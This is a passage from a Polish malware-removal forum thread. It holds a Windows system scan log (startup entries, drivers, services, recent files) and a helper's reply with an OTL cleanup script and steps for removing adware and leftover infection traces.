[2007-07-05 419112] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ACWLIcon] C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe [2007-07-05 124200] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2010-11-15 932288] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher] C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [2010-11-15 35736] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AMSG] C:\Program Files\ThinkVantage\AMSG\Amsg.exe [2007-02-01 419376] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AwaySch] C:\Program Files\Lenovo\AwayTask\AwaySch.EXE [2006-11-07 91688] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BLOG] rundll32 C:\PROGRA~1\ThinkPad\UTILIT~1\BTVLogEx.DLL,StartBattLog [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ccApp] C:\Program Files\Common Files\Symantec Shared\ccApp.exe [2007-01-09 115816] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ChomikBox] C:\Program Files\ChomikBox\chomikbox.exe [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cssauth] C:\Program Files\Lenovo\Client Security Solution\cssauth.exe [2007-08-09 2630968] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DiskeeperSystray] C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe [2006-11-15 217176] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ehTray.exe] C:\Windows\ehome\ehTray.exe [2006-11-02 125440] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EZEJMNAP] C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe [2007-03-28 243248] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HotKeysCmds] C:\Windows\system32\hkcmd.exe [2007-09-24 154136] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IgfxTray] C:\Windows\system32\igfxtray.exe [2007-09-24 141848] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IPLA!] C:\Program Files\ipla\ipla.exe [2011-06-03 19764728] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iPlusManager] C:\Program Files\iPlus\iPlusChecker.exe [2008-05-30 409600] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LenovoOobeOffers] c:\SWTOOLS\LenovoWelcome\LenovoOobeOffers.exe [2007-09-25 28672] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LPManager] C:\PROGRA~1\Lenovo\LENOVO~2\LPMGR.exe [2007-07-12 124256] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\nmapp] C:\Program Files\Pure Networks\Network Magic\nmapp.exe [2007-03-14 321088] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Persistence] C:\Windows\system32\igfxpers.exe [2007-09-24 129560] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PWMTRV] rundll32 C:\PROGRA~1\ThinkPad\UTILIT~1\PWMTR32V.DLL,PwrMgrBkGndMonitor [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe [2008-11-10 1232896] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype] C:\Program Files\Skype\Phone\Skype.exe /nosplash /minimized [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched] C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe [2007-07-12 132496] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Symantec PIF AlertEng] C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe [2008-01-29 583048] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPFNF7] C:\Program Files\Lenovo\NPDIRECT\TPFNF7SP.exe [2007-11-29 59168] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPHOTKEY] C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe [2007-03-09 66176] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TpShocks] C:\Windows\system32\TpShocks.exe [2007-11-22 181536] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TrackPointSrv] C:\Windows\system32\tp4serv.exe [2007-04-26 91184] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TVT Scheduler Proxy] C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe [2007-07-10 540672] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe [2008-11-10 1006264] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe [2006-11-02 201728] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^BTTray.lnk] C:\PROGRA~1\ThinkPad\BLUETO~1\BTTray.exe [2007-03-29 719664] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk] C:\PROGRA~1\DIGITA~1\DLG.exe [2006-11-03 50688] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^LenovoRegistration.lnk] C:\SWTOOLS\LENOVO~1\LENOVO~1.CMD [2007-09-26 166] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk] C:\PROGRA~1\MCAFEE~1\20DEB9~1.181\SSSCHE~1.EXE [2010-01-15 255536] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui] C:\Windows\system32\igfxdev.dll [2007-09-13 204800] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "notification packages"=scecli ACGina [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\PEVSystemStart] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\procexp90.Sys] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableCMD"=0 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] "dontdisplaylastusername"=0 "legalnoticecaption"= "legalnoticetext"= "shutdownwithoutlogon"=1 "undockwithoutlogon"=1 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer] "NoDriveTypeAutoRun"=145 [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list] [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32] "vidc.mrle"=msrle32.dll "vidc.msvc"=msvidc32.dll "msacm.imaadpcm"=imaadp32.acm "msacm.msg711"=msg711.acm "msacm.msgsm610"=msgsm32.acm "msacm.msadpcm"=msadp32.acm "midimapper"=midimap.dll "wavemapper"=msacm32.drv "vidc.uyvy"=msyuv.dll "vidc.yuy2"=msyuv.dll "vidc.yvyu"=msyuv.dll "vidc.iyuv"=iyuv_32.dll "vidc.i420"=iyuv_32.dll "vidc.yvu9"=tsbyuv.dll "msacm.l3acm"=C:\Windows\System32\l3codeca.acm "vidc.cvid"=iccvid.dll "wave"=wdmaud.drv "midi"=wdmaud.drv "mixer"=wdmaud.drv "aux"=wdmaud.drv "wave1"=wdmaud.drv "midi1"=wdmaud.drv "mixer1"=wdmaud.drv "wave2"=wdmaud.drv "midi2"=wdmaud.drv "mixer2"=wdmaud.drv "wave3"=wdmaud.drv "midi3"=wdmaud.drv "mixer3"=wdmaud.drv "aux1"=wdmaud.drv "msacm.vorbis"=vorbis.acm ======List of files/folders created in the last 1 month====== 2011-07-18 10:37:19 ----D---- C:\rsit 2011-07-18 10:17:00 ----D---- C:\Muzyja 2011-07-15 21:23:31 ----A---- C:\Windows\zip.exe 2011-07-15 21:23:31 ----A---- C:\Windows\SWXCACLS.exe 2011-07-15 21:23:31 ----A---- C:\Windows\SWSC.exe 2011-07-15 21:23:31 ----A---- C:\Windows\SWREG.exe 2011-07-15 21:23:31 ----A---- C:\Windows\sed.exe 2011-07-15 21:23:31 ----A---- C:\Windows\PEV.exe 2011-07-15 21:23:31 ----A---- C:\Windows\NIRCMD.exe 2011-07-15 21:23:31 ----A---- C:\Windows\MBR.exe 2011-07-15 21:23:31 ----A---- C:\Windows\grep.exe 2011-07-15 21:23:22 ----D---- C:\Windows\ERDNT 2011-07-15 21:23:19 ----SD---- C:\ComboFix 2011-07-15 21:23:15 ----D---- C:\Qoobox 2011-07-15 21:23:01 ----SD---- C:\32788R22FWJFW 2011-07-15 21:16:11 ----D---- C:\Program Files\Trend Micro 2011-07-15 21:13:47 ----D---- C:\Users\Max\AppData\Roaming\Safer Networking 2011-07-15 21:13:21 ----D---- C:\Program Files\Safer Networking 2011-07-15 21:00:17 ----D---- C:\Users\Max\AppData\Roaming\AIMP 2011-07-15 20:59:16 ----D---- C:\Program Files\AIMP2 2011-07-15 20:38:46 ----AD---- C:\ProgramData\TEMP 2011-07-15 20:38:18 ----A---- C:\Windows\system32\ztvunrar36.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\ztvunace26.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\ztvcabinet.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\UNRAR3.dll 2011-07-15 20:38:18 ----A---- C:\Windows\system32\unacev2.dll 2011-07-15 20:38:17 ----D---- C:\Users\Max\AppData\Roaming\Simply Super Software 2011-07-15 20:38:17 ----D---- C:\ProgramData\Simply Super Software 2011-07-15 20:38:17 ----D---- C:\Program Files\Trojan Remover 2011-07-13 11:48:57 ----D---- C:\Windows\system32\Adobe 2011-07-11 13:14:07 ----D---- C:\Program Files\DAEMON Tools Toolbar 2011-07-11 13:13:33 ----D---- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite 2011-07-11 13:13:33 ----D---- C:\ProgramData\DAEMON Tools Lite 2011-07-09 17:31:35 ----D---- C:\7' 2011-07-08 16:01:51 ----D---- C:\Program Files\RegCleaner 2011-07-08 14:36:30 ----A---- C:\Windows\system32\drivers\aswFsBlk.sys 2011-07-08 14:36:29 ----A---- C:\Windows\system32\drivers\aswSP.sys 2011-07-08 14:36:27 ----A---- C:\Windows\system32\drivers\aswTdi.sys 2011-07-08 14:36:27 ----A---- C:\Windows\system32\drivers\aswRdr.sys 2011-07-08 14:36:26 ----A---- C:\Windows\system32\drivers\aswSnx.sys 2011-07-08 14:36:25 ----A---- C:\Windows\system32\drivers\aswMonFlt.sys 2011-07-08 14:35:28 ----A---- C:\Windows\system32\aswBoot.exe 2011-07-08 14:35:28 ----A---- C:\Windows\avastSS.scr 2011-07-08 13:37:06 ----D---- C:\Dokument 2011-07-08 13:34:44 ----D---- C:\Zdjecia 2011-06-28 10:35:24 ----D---- C:\Users\Max\AppData\Roaming\Skype 2011-06-28 10:35:18 ----D---- C:\ProgramData\Google 2011-06-28 10:34:59 ----D---- C:\ProgramData\Skype 2011-06-26 12:28:22 ----ASH---- C:\hiberfil.sys 2011-06-26 12:25:20 ----A---- C:\Windows\ntbtlog.txt ======List of files/folders modified in the last 1 month====== 2011-07-18 10:37:20 ----D---- C:\Windows\Prefetch 2011-07-18 10:37:03 ----D---- C:\Windows\Temp 2011-07-18 10:16:32 ----D---- C:\Windows\System32 2011-07-18 10:16:32 ----D---- C:\Windows\inf 2011-07-18 10:16:32 ----A---- C:\Windows\system32\PerfStringBackup.INI 2011-07-17 22:12:56 ----SHD---- C:\System Volume Information 2011-07-17 22:12:08 ----D---- C:\Windows\tracing 2011-07-17 22:10:47 ----D---- C:\Windows\Minidump 2011-07-17 22:10:41 ----D---- C:\Windows 2011-07-16 07:39:45 ----SHD---- C:\Windows\Installer 2011-07-16 07:39:12 ----A---- C:\Windows\win.ini 2011-07-15 21:23:16 ----D---- C:\Windows\system32\drivers 2011-07-15 21:16:11 ----RD---- C:\Program Files 2011-07-15 20:53:30 ----D---- C:\Windows\system32\catroot 2011-07-15 20:38:46 ----HD---- C:\ProgramData 2011-07-15 20:35:30 ----D---- C:\Windows\system32\Tasks 2011-07-14 22:04:25 ----D---- C:\Users\Max\AppData\Roaming\ipla 2011-07-13 17:06:47 ----D---- C:\SWSHARE 2011-07-13 11:48:58 ----SD---- C:\Windows\Downloaded Program Files 2011-07-12 22:22:04 ----D---- C:\Windows\Tasks 2011-07-12 22:22:04 ----D---- C:\Program Files\Google 2011-07-12 14:30:43 ----D---- C:\Program Files\Mozilla Firefox 2011-07-12 14:22:27 ----D---- C:\Program Files\Opera 2011-07-12 13:11:06 ----D---- C:\Windows\system32\catroot2 2011-07-11 12:51:39 ----D---- C:\output 2011-07-08 14:36:19 ----D---- C:\Windows\winsxs 2011-07-08 14:35:04 ----D---- C:\ProgramData\AVAST Software 2011-07-08 14:35:04 ----D---- C:\Program Files\AVAST Software 2011-07-08 14:20:03 ----D---- C:\Windows\pss 2011-07-08 14:18:03 ----A---- C:\Windows\system32\PROCDB.INI 2011-07-08 14:18:01 ----A---- C:\Windows\system32\IPSCtrl.INI 2011-07-08 14:16:04 ----D---- C:\ProgramData\Lenovo 2011-07-08 14:16:02 ----D---- C:\Program Files\Microsoft Silverlight 2011-07-08 14:15:55 ----D---- C:\Windows\system32\spool 2011-07-08 14:15:55 ----D---- C:\Users\Max\AppData\Roaming\PhotoScape ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R0 iaStor;Intel AHCI Controller; C:\Windows\system32\DRIVERS\iaStor.sys [2007-02-12 277784] R0 Shockprf;Shockprf; C:\Windows\System32\DRIVERS\Apsx86.sys [2007-10-16 103472] R0 TPDIGIMN;TPDIGIMN; C:\Windows\System32\DRIVERS\ApsHM86.sys [2007-10-16 19504] R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2011-07-04 25432] R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2011-07-04 441176] R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2011-07-04 309848] R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2011-07-04 43608] R1 eeCtrl;Symantec Eraser Control driver; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [2007-01-10 387384] R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20070108.003\IDSvix86.sys [2006-12-28 212280] R1 lenovo.smi;Lenovo System Interface Driver; C:\Windows\system32\DRIVERS\smiif32.sys [2006-08-30 13744] R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-01-11 25400] R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-01-09 191544] R1 TPPWRIF;TPPWRIF; C:\Windows\System32\drivers\Tppwr32v.sys [2007-12-06 12080] R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2011-07-04 19544] R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2011-07-04 54104] R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672] R2 PROCDD;IPS Helper Driver; C:\Windows\system32\DRIVERS\PROCDD.SYS [2006-11-06 12080] R2 tvtfilter;tvtfilter; C:\Windows\system32\DRIVERS\tvtfilter.sys [2008-11-10 33536] R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2007-04-10 8704] R3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0; C:\Windows\system32\DRIVERS\b57nd60x.sys [2007-05-02 179712] R3 BthEnum;Usługa wyliczania Bluetooth; C:\Windows\system32\DRIVERS\BthEnum.sys [2011-04-04 19456] R3 BthPan;Urządzenie Bluetooth (sieć osobista); C:\Windows\system32\DRIVERS\bthpan.sys [2006-11-02 92160] R3 BTHUSB;Sterownik USB odbiornika radiowego Bluetooth; C:\Windows\System32\Drivers\BTHUSB.sys [2011-04-04 29184] R3 btwaudio;Urz¹dzenie dŸwiêkowe Bluetooth; C:\Windows\system32\drivers\btwaudio.sys [2007-03-29 79664] R3 btwavdt;Bluetooth AVDT Service; C:\Windows\system32\drivers\btwavdt.sys [2007-02-27 81200] R3 btwrchid;btwrchid; C:\Windows\system32\DRIVERS\btwrchid.sys [2007-02-27 16432] R3 EraserUtilRebootDrv;EraserUtilRebootDrv; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2007-01-10 102712] R3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDARTN.sys [2007-04-27 215040] R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2007-03-25 984064] R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2007-03-25 208384] R3 IBMPMDRV;IBMPMDRV; C:\Windows\system32\DRIVERS\ibmpmdrv.sys [2007-05-31 21424] R3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd32.sys [2007-09-13 1925632] R3 NETw4v32;Sterownik karty Intel(R) Wireless WiFi Link dla systemu Windows Vista 32 Bit; C:\Windows\system32\DRIVERS\NETw4v32.sys [2007-04-29 2219520] R3 psadd;Lenovo Parties Service Access Device Driver; C:\Windows\system32\DRIVERS\psadd.sys [2007-05-22 21376] R3 RFCOMM;Urządzenie Bluetooth (Protokół TDI RFCOMM); C:\Windows\system32\DRIVERS\rfcomm.sys [2006-11-02 49664] R3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-01-09 12984] R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2008-11-10 115000] R3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-01-09 145976] R3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-01-09 40120] R3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-01-09 38200] R3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-01-09 27576] R3 Tp4Track;PS/2 TrackPoint Driver; C:\Windows\system32\DRIVERS\tp4track.sys [2007-04-26 22832] R3 TVTI2C;Lenovo SM bus driver; C:\Windows\system32\DRIVERS\Tvti2c.sys [2007-05-22 30336] R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2007-03-25 660480] S3 BTHPORT;Sterownik portu Bluetooth; C:\Windows\System32\Drivers\BTHport.sys [2011-04-04 220160] S3 drmkaud;Microsoft Kernel DRM Audio Descrambler; C:\Windows\system32\drivers\drmkaud.sys [2006-11-02 5632] S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704] S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2007-09-13 1925632] S3 MSKSSRV;Serwer proxy usługi Microsoft Streaming; C:\Windows\system32\drivers\MSKSSRV.sys [2006-11-02 8192] S3 MSPCLOCK;Serwer proxy zegara Microsoft Streaming; C:\Windows\system32\drivers\MSPCLOCK.sys [2006-11-02 5888] S3 MSPQM;Serwer proxy menedżera jakości Microsoft Streaming; C:\Windows\system32\drivers\MSPQM.sys [2006-11-02 5504] S3 MSTEE;Konwerter strumieni Tee/Sink-to-Sink Microsoft Streaming; C:\Windows\system32\drivers\MSTEE.sys [2006-11-02 6016] S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20070110.052\NAVENG.SYS [2007-01-10 80408] S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20070110.052\NAVEX15.SYS [2007-01-10 833048] S3 NETw3v32;Sterownik karty Intel(R) PRO/Wireless 3945ABG dla 32-bitowej wersji systemu Windows Vista; C:\Windows\system32\DRIVERS\NETw3v32.sys [2006-11-02 1781760] S3 nmwcd;Nokia USB Phone Parent; C:\Windows\system32\drivers\ccdcmb.sys [2008-05-02 17536] S3 SPBBCDrv;SPBBCDrv; \??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys [2007-01-03 417592] S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-01-11 247608] S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-01-11 276792] S3 upperdev;upperdev; C:\Windows\system32\DRIVERS\usbser_lowerflt.sys [2008-05-02 8064] S3 usbaudio;Sterownik audio USB (WDM); C:\Windows\system32\drivers\usbaudio.sys [2006-11-02 71552] S3 usbser;USB Modem Driver; C:\Windows\system32\DRIVERS\usbser.sys [2006-11-02 28160] S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2006-11-02 39936] S3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2006-11-02 82560] ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R2 avast! Antivirus;avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2011-07-04 42184] R2 BthServ;@%SystemRoot%\System32\bthserv.dll,-101; C:\Windows\system32\svchost.exe [2006-11-02 22016] R2 nmservice;Pure Networks Network Magic Service; C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe [2007-03-14 321088] R2 TPHDEXLGSVC;ThinkPad HDD APS Logging Service; C:\Windows\System32\TPHDEXLG.exe [2007-10-16 37424] R2 TVT Backup Protection Service;TVT Backup Protection Service; C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe [2007-07-10 569344] R2 TVT Backup Service;TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [2007-07-10 950272] S3 nmraapache;Pure Networks Net2Go Service; C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe [2007-03-14 12800] S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136] S4 AcPrfMgrSvc;Ac Profile Manager Service; C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe [2007-07-05 91432] S4 AcSvc;Access Connections Main Service; C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe [2007-07-05 206120] S4 ccEvtMgr;Symantec Event Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 ccSetMgr;Symantec Settings Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 CLTNetCnService;Symantec Lic NetConnect service; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 comHost;COM Host; C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe [2007-01-12 49248] S4 Diskeeper;Diskeeper; C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe [2006-11-15 634988] S4 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120] S4 IBMPMSVC;ThinkPad PM Service; C:\Windows\system32\ibmpmsvc.exe [2007-05-31 36400] S4 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632] S4 IPSSVC;IPS Core Service; C:\Windows\system32\IPSSVC.EXE [2007-01-30 108080] S4 ISPwdSvc;Symantec IS Password Validation; C:\Program Files\Norton Internet Security\isPwdSvc.exe [2007-01-14 80504] S4 LiveUpdate Notice Ex;LiveUpdate Notice Service Ex; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2007-01-09 108648] S4 LiveUpdate Notice Service;LiveUpdate Notice Service; C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe [2008-01-29 583048] S4 LiveUpdate;LiveUpdate; C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE [2007-09-26 2999664] S4 McComponentHostService;McAfee Security Scan Component Host Service; C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe [2010-01-15 227232] S4 SUService;System Update; c:\Program Files\Lenovo\System Update\SUService.exe [2007-06-07 13312] S4 Symantec Core LC;Symantec Core LC; C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe [2008-11-10 1174664] S4 SymAppCore;Symantec AppCore Service; C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe [2007-01-05 47712] S4 ThinkVantage Registry Monitor Service;ThinkVantage Registry Monitor Service; C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe [2007-07-10 644408] S4 TPHKSVC;On Screen Display; C:\Program Files\LENOVO\HOTKEY\TPHKSVC.exe [2007-03-02 55936] S4 TSSCoreService;TSS Core Service; C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe [2007-08-09 722232] S4 TVT Scheduler;TVT Scheduler; c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe [2007-07-10 1126400] S4 tvtnetwk;tvtnetwk; C:\Program Files\Lenovo\Rescue and Recovery\ADM\IUService.exe [2007-07-10 45056] S4 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2007-04-10 386560] -----------------EOF----------------- [/log]
wirusolog komentarz 18 lipca 2011 komentarz 18 lipca 2011 (edytowane) [b]1.[/b] Uruchom OTL i w oknie [b]Własne opcje skanowania/Skrypt[/b] wklej następujący tekst: [code]:OTL MsConfig - StartUpReg: BLOG - hkey= - key= - File not found MsConfig - StartUpReg: ChomikBox - hkey= - key= - File not found MsConfig - StartUpReg: HotKeysCmds - hkey= - key= - File not found MsConfig - StartUpReg: IgfxTray - hkey= - key= - File not found MsConfig - StartUpReg: Persistence - hkey= - key= - File not found MsConfig - StartUpReg: PWMTRV - hkey= - key= - File not found MsConfig - StartUpReg: Skype - hkey= - key= - File not found MsConfig - StartUpReg: TpShocks - hkey= - key= - File not found MsConfig - StartUpReg: TrackPointSrv - hkey= - key= - File not found MsConfig - StartUpReg: Windows Defender - hkey= - key= - File not found O4 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000..\Run: [Tok-Cirrhatus] File not found O4 - HKLM..\Run: [] File not found SRV - File not found [Disabled | Stopped] -- -- (Harmonogram automatycznej usługi LiveUpdate) @Alternate Data Stream - 144 bytes -> C:\ProgramData\TEMP:CB0AACC9 :Reg [-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2] :Commands [emptyflash] [emptytemp][/code] Kliknij w [b]Wykonaj skrypt[/b]. Zatwierdź restart komputera. [b]2.[/b] W panelu sterowania, dodaj lub usuń programy odinstaluj: [b]DAEMON Tools Toolbar[/b] [b]3.[/b] Ściągnij [url=http://www.teamxscript.org/too/AD-R.exe][b][color=blue][u]Ad-Remover[/url][/b][/color][/u] i wciśnij w nim [size=150][b]Clean[/b][/size] Pokaż raport z tego narzędzia. [b]4.[/b] Następnie uruchamiasz OTL ponownie, tym razem wywołujesz opcję [b]Skanuj[/b]. Pokazujesz nowe logi z OTL + raport z usuwania. Czyli końcowo pokazujesz: [b][list] [*]Raport z usuwania OTL (po restarcie), [*]Raport z czyszczenia Ad-Remover'em, [*]Nowe logi z OTL, [/list][/b]
